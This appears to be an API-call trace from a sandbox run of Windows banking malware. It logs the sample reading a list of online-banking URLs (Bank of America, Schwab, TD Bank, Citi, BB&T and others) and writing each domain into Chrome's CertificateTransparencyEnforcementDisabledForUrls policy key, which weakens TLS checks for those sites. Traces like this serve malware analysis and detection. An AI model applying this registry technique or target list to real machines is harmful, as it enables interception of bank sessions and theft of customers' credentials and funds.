	[0191.537] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.537] strstr (_Str="onlinebanking.suntrust.com", _SubStr="www.") returned 0x0
	[0191.537] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.537] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11916f0
	[0191.537] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11916f0 | out: hHeap=0x260000) returned 1
	[0191.538] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.538] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.538] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.538] strstr (_Str="*/rcrd/1531737415491610*", _SubStr="https://") returned 0x0
	[0191.538] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.538] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.538] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.538] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.538] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.538] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.538] strstr (_Str="https://onlinebanking.tdbank.com/", _SubStr="https://") returned="https://onlinebanking.tdbank.com/"
	[0191.538] strncpy (in: _Dest=0x1dfa58, _Source="onlinebanking.tdbank.com/", _Count=0x18 | out: _Dest="onlinebanking.tdbank.comom") returned="onlinebanking.tdbank.comom"
	[0191.538] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.538] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x314) returned 0x0
	[0191.538] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x31c, lpdwDisposition=0x0) returned 0x0
	[0191.538] RegSetValueExA (in: hKey=0x31c, lpValueName="43", Reserved=0x0, dwType=0x1, lpData="onlinebanking.tdbank.com", cbData=0x18 | out: lpData="onlinebanking.tdbank.com") returned 0x0
	[0191.539] RegCloseKey (hKey=0x31c) returned 0x0
	[0191.539] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.539] strstr (_Str="onlinebanking.tdbank.com", _SubStr="www.") returned 0x0
	[0191.539] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.539] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191718
	[0191.539] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191718 | out: hHeap=0x260000) returned 1
	[0191.539] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.539] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.539] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.539] strstr (_Str="*123tdbank.com123*", _SubStr="https://") returned 0x0
	[0191.539] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.539] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0191.539] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.539] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.539] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.539] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.540] strstr (_Str="https://onlinebanking.tdbank.com/ngp_api/v1/security/user/session*", _SubStr="https://") returned="https://onlinebanking.tdbank.com/ngp_api/v1/security/user/session*"
	[0191.540] strncpy (in: _Dest=0x1dfa58, _Source="onlinebanking.tdbank.com/ngp_api/v1/security/user/session*", _Count=0x18 | out: _Dest="onlinebanking.tdbank.com") returned="onlinebanking.tdbank.com"
	[0191.540] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.540] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x318) returned 0x0
	[0191.540] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x320, lpdwDisposition=0x0) returned 0x0
	[0191.540] RegSetValueExA (in: hKey=0x320, lpValueName="44", Reserved=0x0, dwType=0x1, lpData="client.schwab.com", cbData=0x11 | out: lpData="client.schwab.com") returned 0x0
	[0191.541] RegCloseKey (hKey=0x320) returned 0x0
	[0191.541] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.541] strstr (_Str="client.schwab.com", _SubStr="www.") returned 0x0
	[0191.541] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.541] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.541] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.541] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.541] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.541] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.541] strstr (_Str="https://client.schwab.com/Accounts/Summary/Summary.aspx*", _SubStr="https://") returned="https://client.schwab.com/Accounts/Summary/Summary.aspx*"
	[0191.541] strncpy (in: _Dest=0x1dfa58, _Source="client.schwab.com/Accounts/Summary/Summary.aspx*", _Count=0x11 | out: _Dest="client.schwab.com") returned="client.schwab.com"
	[0191.541] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.542] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x31c) returned 0x0
	[0191.542] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x324, lpdwDisposition=0x0) returned 0x0
	[0191.542] RegSetValueExA (in: hKey=0x324, lpValueName="45", Reserved=0x0, dwType=0x1, lpData="lms.schwab.com", cbData=0xe | out: lpData="lms.schwab.com") returned 0x0
	[0191.542] RegCloseKey (hKey=0x324) returned 0x0
	[0191.543] strstr (_Str="lms.schwab.com", _SubStr="www.") returned 0x0
	[0191.543] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.543] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191740
	[0191.543] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191740 | out: hHeap=0x260000) returned 1
	[0191.543] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.543] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.543] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.543] strstr (_Str="https://*lms.schwab.com/Login*", _SubStr="https://") returned="https://*lms.schwab.com/Login*"
	[0191.543] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.543] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.543] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.543] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.543] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.543] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.543] strstr (_Str="https://client.schwab.com/api/summary/account*", _SubStr="https://") returned="https://client.schwab.com/api/summary/account*"
	[0191.543] strncpy (in: _Dest=0x1dfa58, _Source="client.schwab.com/api/summary/account*", _Count=0x11 | out: _Dest="client.schwab.com") returned="client.schwab.com"
	[0191.543] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.543] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x320) returned 0x0
	[0191.543] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x328, lpdwDisposition=0x0) returned 0x0
	[0191.543] RegSetValueExA (in: hKey=0x328, lpValueName="46", Reserved=0x0, dwType=0x1, lpData="www.bankofamerica.com", cbData=0x15 | out: lpData="www.bankofamerica.com") returned 0x0
	[0191.544] RegCloseKey (hKey=0x328) returned 0x0
	[0191.544] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.544] strstr (_Str="www.bankofamerica.com", _SubStr="www.") returned="www.bankofamerica.com"
	[0191.544] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.544] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x324) returned 0x0
	[0191.544] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x32c, lpdwDisposition=0x0) returned 0x0
	[0191.545] RegSetValueExA (in: hKey=0x32c, lpValueName="47", Reserved=0x0, dwType=0x1, lpData="bankofamerica.com", cbData=0x11 | out: lpData="bankofamerica.com") returned 0x0
	[0191.545] RegCloseKey (hKey=0x32c) returned 0x0
	[0191.546] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.546] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.546] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.546] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.546] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.546] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.546] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.546] strstr (_Str="https://www.bankofamerica.com/smallbusiness/", _SubStr="https://") returned="https://www.bankofamerica.com/smallbusiness/"
	[0191.546] strncpy (in: _Dest=0x1dfa58, _Source="www.bankofamerica.com/smallbusiness/", _Count=0x15 | out: _Dest="www.bankofamerica.com") returned="www.bankofamerica.com"
	[0191.546] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.546] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x328) returned 0x0
	[0191.546] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x330, lpdwDisposition=0x0) returned 0x0
	[0191.546] RegSetValueExA (in: hKey=0x330, lpValueName="48", Reserved=0x0, dwType=0x1, lpData="secure.bankofamerica.com", cbData=0x18 | out: lpData="secure.bankofamerica.com") returned 0x0
	[0191.547] RegCloseKey (hKey=0x330) returned 0x0
	[0191.547] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.547] strstr (_Str="secure.bankofamerica.com", _SubStr="www.") returned 0x0
	[0191.547] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.547] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0191.547] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.547] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.547] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.547] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.547] strstr (_Str="https://secure.bankofamerica.com/myaccounts/brain/redirect.go?target=acc*", _SubStr="https://") returned="https://secure.bankofamerica.com/myaccounts/brain/redirect.go?target=acc*"
	[0191.547] strncpy (in: _Dest=0x1dfa58, _Source="secure.bankofamerica.com/myaccounts/brain/redirect.go?target=acc*", _Count=0x18 | out: _Dest="secure.bankofamerica.com") returned="secure.bankofamerica.com"
	[0191.547] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.547] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x32c) returned 0x0
	[0191.547] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x334, lpdwDisposition=0x0) returned 0x0
	[0191.548] RegSetValueExA (in: hKey=0x334, lpValueName="49", Reserved=0x0, dwType=0x1, lpData="cashproonline.bankofamerica.com", cbData=0x1f | out: lpData="cashproonline.bankofamerica.com") returned 0x0
	[0191.548] RegCloseKey (hKey=0x334) returned 0x0
	[0191.548] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.548] strstr (_Str="cashproonline.bankofamerica.com", _SubStr="www.") returned 0x0
	[0191.548] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.549] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.549] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.549] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.549] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.549] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.549] strstr (_Str="https://www.bankofamerica.com/index.jsp*", _SubStr="https://") returned="https://www.bankofamerica.com/index.jsp*"
	[0191.549] strncpy (in: _Dest=0x1dfa58, _Source="www.bankofamerica.com/index.jsp*", _Count=0x15 | out: _Dest="www.bankofamerica.commerica.com") returned="www.bankofamerica.commerica.com"
	[0191.549] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.549] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x330) returned 0x0
	[0191.549] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x338, lpdwDisposition=0x0) returned 0x0
	[0191.549] RegSetValueExA (in: hKey=0x338, lpValueName="50", Reserved=0x0, dwType=0x1, lpData="allmyaccounts.bankofamerica.com", cbData=0x1f | out: lpData="allmyaccounts.bankofamerica.com") returned 0x0
	[0191.550] RegCloseKey (hKey=0x338) returned 0x0
	[0191.550] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.550] strstr (_Str="allmyaccounts.bankofamerica.com", _SubStr="www.") returned 0x0
	[0191.550] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.550] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.550] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.550] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.550] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.550] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.550] strstr (_Str="https://finapp.allmyaccounts.bankofamerica.com/finapp/*", _SubStr="https://") returned="https://finapp.allmyaccounts.bankofamerica.com/finapp/*"
	[0191.550] strncpy (in: _Dest=0x1dfa58, _Source="finapp.allmyaccounts.bankofamerica.com/finapp/*", _Count=0x26 | out: _Dest="finapp.allmyaccounts.bankofamerica.com") returned="finapp.allmyaccounts.bankofamerica.com"
	[0191.550] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.550] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x334) returned 0x0
	[0191.550] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x33c, lpdwDisposition=0x0) returned 0x0
	[0191.551] RegSetValueExA (in: hKey=0x33c, lpValueName="51", Reserved=0x0, dwType=0x1, lpData="finapp.allmyaccounts.bankofamerica.com", cbData=0x26 | out: lpData="finapp.allmyaccounts.bankofamerica.com") returned 0x0
	[0191.551] RegCloseKey (hKey=0x33c) returned 0x0
	[0191.551] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.551] strstr (_Str="finapp.allmyaccounts.bankofamerica.com", _SubStr="www.") returned 0x0
	[0191.551] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.551] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.551] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.551] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.552] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.552] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.552] strstr (_Str="https://secure.bankofamerica.com/myaccounts/details/card*", _SubStr="https://") returned="https://secure.bankofamerica.com/myaccounts/details/card*"
	[0191.552] strncpy (in: _Dest=0x1dfa58, _Source="secure.bankofamerica.com/myaccounts/details/card*", _Count=0x18 | out: _Dest="secure.bankofamerica.comkofamerica.com") returned="secure.bankofamerica.comkofamerica.com"
	[0191.552] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.552] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x338) returned 0x0
	[0191.552] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x340, lpdwDisposition=0x0) returned 0x0
	[0191.552] RegSetValueExA (in: hKey=0x340, lpValueName="52", Reserved=0x0, dwType=0x1, lpData="securentrycorp.vectrabank.com", cbData=0x1d | out: lpData="securentrycorp.vectrabank.com") returned 0x0
	[0191.553] RegCloseKey (hKey=0x340) returned 0x0
	[0191.553] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.553] strstr (_Str="securentrycorp.vectrabank.com", _SubStr="www.") returned 0x0
	[0191.553] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.553] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191830
	[0191.553] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191830 | out: hHeap=0x260000) returned 1
	[0191.553] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.553] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.553] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.553] strstr (_Str="*/rcrd/1528137865954561*", _SubStr="https://") returned 0x0
	[0191.553] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.553] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174b00
	[0191.553] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174b00 | out: hHeap=0x260000) returned 1
	[0191.553] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.553] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.553] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.553] strstr (_Str="https://bank.bbt.com/mfapp/web/myfi/home*", _SubStr="https://") returned="https://bank.bbt.com/mfapp/web/myfi/home*"
	[0191.553] strncpy (in: _Dest=0x1dfa58, _Source="bank.bbt.com/mfapp/web/myfi/home*", _Count=0xc | out: _Dest="bank.bbt.comrp.vectrabank.com") returned="bank.bbt.comrp.vectrabank.com"
	[0191.554] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x33c) returned 0x0
	[0191.554] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x344, lpdwDisposition=0x0) returned 0x0
	[0191.554] RegSetValueExA (in: hKey=0x344, lpValueName="53", Reserved=0x0, dwType=0x1, lpData="bank.bbt.com", cbData=0xc | out: lpData="bank.bbt.com") returned 0x0
	[0191.554] RegCloseKey (hKey=0x344) returned 0x0
	[0191.555] strstr (_Str="bank.bbt.com", _SubStr="www.") returned 0x0
	[0191.555] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.555] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174b00
	[0191.555] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174b00 | out: hHeap=0x260000) returned 1
	[0191.555] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.555] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.555] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.555] strstr (_Str="https://bank.bbt.com/auth/kba_reg_update.tb*", _SubStr="https://") returned="https://bank.bbt.com/auth/kba_reg_update.tb*"
	[0191.555] strncpy (in: _Dest=0x1dfa58, _Source="bank.bbt.com/auth/kba_reg_update.tb*", _Count=0xc | out: _Dest="bank.bbt.com") returned="bank.bbt.com"
	[0191.555] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x340) returned 0x0
	[0191.555] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x348, lpdwDisposition=0x0) returned 0x0
	[0191.555] RegSetValueExA (in: hKey=0x348, lpValueName="54", Reserved=0x0, dwType=0x1, lpData="online.citi.com", cbData=0xf | out: lpData="online.citi.com") returned 0x0
	[0191.556] RegCloseKey (hKey=0x348) returned 0x0
	[0191.556] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x118bac0
	[0191.556] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118bac0 | out: hHeap=0x260000) returned 1
	[0191.556] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118cdd8 | out: hHeap=0x260000) returned 1
	[0191.556] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x118cdd8
